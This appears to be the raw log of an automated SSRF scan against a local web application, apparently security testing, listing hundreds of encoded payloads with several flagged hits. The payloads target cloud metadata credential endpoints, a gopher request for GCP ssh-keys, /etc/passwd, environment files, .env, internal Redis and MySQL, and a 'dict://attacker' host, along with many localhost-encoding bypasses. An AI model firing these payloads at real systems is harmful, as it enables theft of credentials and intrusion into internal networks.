⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2F%2F%2F%7Bdomain%7D` _(POST)_ +- Testing: `http://localhost:4200/?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.0.0.1%2F%2F%2F%7Bdomain%7Dst%3A%2B11211aaa` _(POST)_ +- Testing: `http://localhost:4200/?url=st%3A00011211aaaa` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=st%3A00011211aaaa` _(POST)_ +- Testing: `http://localhost:4200/?url=0%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=0%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=1.1.1.1%20%26%402.2.2.2%23%20%403.3.3.3%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%5C%5C%40127.2.2.2%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%5C%5C%40%40127.2.2.2%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%3A%5C%5C%40%40127.2.2.2%3A80%2F` _(POST)_ +- Testing: `http://localhost:4200/?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` + ⚠️ - **Possible SSRF vulnerability at:** `http://localhost:4200/?url=127.1.1.1%3A80%23%5C%5C%40127.2.2.2%3A80%2F` _(POST)_ +## Testing endpoint: http://localhost:4200/api/admin/overseer_images +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=metadata.google.internal%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A8080%2Fadmin` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2F%2Fproc%2Fself%2Fenviron` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A3000%2Fadmin` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A3000%2Fconfig` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A3000%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A3000%2Frails%2Finfo` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A3000%2Flogs` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=mysql%3A%2F%2F127.0.0.1%3A3306%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=mysql%3A%2F%2Flocalhost%3A3306%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=redis%3A%2F%2F127.0.0.1%3A6379%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=redis%3A%2F%2Flocalhost%3A6379%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A9876%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A54247%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A59465%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2F%2Fvar%2Flog%2Fnginx%2Faccess.log` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2F.git%2Fconfig` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Fmetadata%2Finstance` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fdocs%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Finternal` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Flogs` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fconfig` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fauth_test` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Foverseer_images` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fcampuses` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fcsv` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fprojects` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fsettings` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fstudents` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fsubmission` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Ftasks` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fteaching_periods` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Ftii_actions` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Ftii_eula` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Ftii_hook` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Ftutorials` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Funit_roles` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Funits` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2Fapi%2Fusers` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2F.env` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A4200%2F.git` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A25%2F%20SMTP` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A3128%2F%20Squid` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0000%3A%3A1%5D%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%2Fthefile` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%91%A0%E2%91%A1%E2%91%A6.%E2%93%AA.%E2%93%AA.%E2%93%AA` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.127.127.127` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.1.3` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.0` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=2130706433` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=017700000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com%40127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%23google.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com.127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com%40localhost` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%23google.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=google.com.localhost` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%2Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%2F%3Fd%3Dgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2500google.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%2F%2F%2Fgoogle.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localtest.me` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=http%3A%400%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127%E3%80%820%E3%80%820%E3%80%821` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127%25E3%2580%25820%25E3%2580%25820%25E3%2580%25821` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=2130706433%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235521%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235777%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=00000177.00000000.00000000.00000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f000001%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xc0a80014%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f.0x00.0x00.0x01` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x0000007f.0x00000000.0x00000000.0x00000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.000000000000.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost%3A00011211aaaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localtest.me` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=mail.ebc.apple.com` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=1ynrnhl.xip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=customer1.app.localhost.my.company.127.0.0.1.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=spoofed.burpcollaborator.net` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.1.3` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localhost` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=1.0.0.127.in-addr.arpa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=01111111000000000000000000000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f.0x0.0x0.0x1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.0.0.01` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=7F000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=2130706433` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=6425673729` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127_0._0_1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%3A%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A0000%3A0000%3A0000%3A0000%3Affff%3A7f00%3A0001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=localtest.me` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=bugbounty.dod.network` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.127.127.127` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%E2%93%90%E2%91%A8%E2%93%95%E2%93%94%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%91%A1%E2%91%A7%E2%91%A4%E2%91%A1%E2%93%AA%E2%91%A2%E2%91%A8%E2%91%A0%E2%91%A5%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=whitelisted%40127.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=017700000001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.00.00.01` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000.0000.0000.0000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.0000.0000.0001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0177.0001.0000..0001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f.0x1.0x0.0x1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x7f.0x1.0x1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=ht%EF%BF%BD%EF%B8%8Ftp%3A%2F%2F12%EF%BF%BD7.0.0.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A%2B11211aaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=loopback%3A00011211aaaa` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=2852039166` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=7147006462` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xa9.0xfe.0xa9.0xfe` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0251.0376.0251.0376` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169%E3%80%82254%E3%80%82169%E3%80%82254` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169%EF%BD%A1254%EF%BD%A1169%EF%BD%A1254` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%EF%BD%A1%E2%91%A3%E2%91%A1%E2%91%A4%EF%BD%A1%E2%91%A4%E2%91%A0%E2%93%AA%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%E2%91%A0%E2%91%A5%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%EF%BD%A1%E2%91%AF%E2%91%A8%EF%BD%A1%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%E2%93%95%E2%93%95%E2%93%95%E2%93%95%3A%E2%91%A0%E2%91%A5%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%E3%80%82%E2%91%AF%E2%91%A8%E3%80%82%E2%91%A1%E2%91%A4%E2%91%A3%5D%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%E3%80%82%E2%93%AA%E2%91%A2%E2%91%A6%E2%91%A5%E3%80%82%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%A7%E2%93%90%E2%91%A8%EF%BD%A1%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%E3%80%82%E2%91%AF%E2%91%A5%E2%91%A7%E2%91%A8%E2%91%A5%E2%91%A5%E2%91%A1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%E2%93%AA%E2%93%AA%E2%91%A1%E2%91%A4%E2%91%A0%EF%BD%A1%E2%93%AA%E2%93%A7%E2%93%95%E2%93%94%EF%BD%A1%E2%91%A3%E2%91%A2%E2%91%A4%E2%91%A0%E2%91%A7%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=dict%3A%2F%2Fattacker%3A11111` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2F%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2F%5C%2F%5C%2Fetc%2Fpasswd` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=file%3A%2F%2Fpath%2Fto%2Ffile` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=gopher%3A%2F%2Fmetadata.google.internal%3A80%2FxGET%2520%2FcomputeMetadata%2Fv1%2Finstance%2Fattributes%2Fssh-keys%2520HTTP%252f%2531%252e%2531%250AHost%3A%2520metadata.google.internal%250AAccept%3A%2520%252a%252f%252a%250aMetadata-Flavor%3A%2520Google%250d%250a` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=gopher%3A%2F%2Fnozaki.io%2F_SSRF%250ATest!` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0.0.0.0%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0.0.0.0%3A443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0.0.0.0%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0.0.0.0%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1%3A25` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1%3A3128` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0000%3A%3A1%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0251.00376.000251.0000376` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0x41414141A9FEA9FE` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xA9.0xFE.0xA9.0xFE` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xA9FEA9FE` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=0xa9fea9fe` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=100.100.100.200%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=100.100.100.200%2Flatest%2Fmeta-data%2Fimage-id` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=100.100.100.200%2Flatest%2Fmeta-data%2Finstance-id` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.0` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A2379%2Fversion` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A443` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A8000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A9901` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A8001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.0.0.1%3A8444` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%23%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%3A%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.1.1.1%3A80%5C%40%40127.2.2.2%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=127.127.127.127.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254.xip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2FcomputeMetadata%2Fv1%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fdynamic%2Finstance-identity%2Fdocument` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fami-id` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fhostname` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2FPhotonInstance` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fdummy` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fs3access` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F0%2Fopenssh-key` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Fpublic-keys%2F%5BID%5D%2Fopenssh-key` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fmeta-data%2Freservation-id` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fuser-data` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=169.254.169.254%2Flatest%2Fuser-data%2Fiam%2Fsecurity-credentials%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=192.0.0.192%2Flatest%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=192.0.0.192%2Flatest%2Fattributes%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=192.0.0.192%2Flatest%2Fmeta-data%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=192.0.0.192%2Flatest%2Fuser-data%2F` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235521` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=3232235777` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=425.510.425.510` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A8444` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B0%3A0%3A0%3A0%3A0%3Affff%3A127.0.0.1%5D%3A9901` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A22` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A25` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A3128` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A80` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A3389` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A8000` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A8001` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A8444` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=%5B%3A%3A%5D%3A9901` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=customer2-app-169-254-169-254.nip.io` +- Testing: `http://localhost:4200/api/admin/overseer_images?url=instance-data` +- Testing: 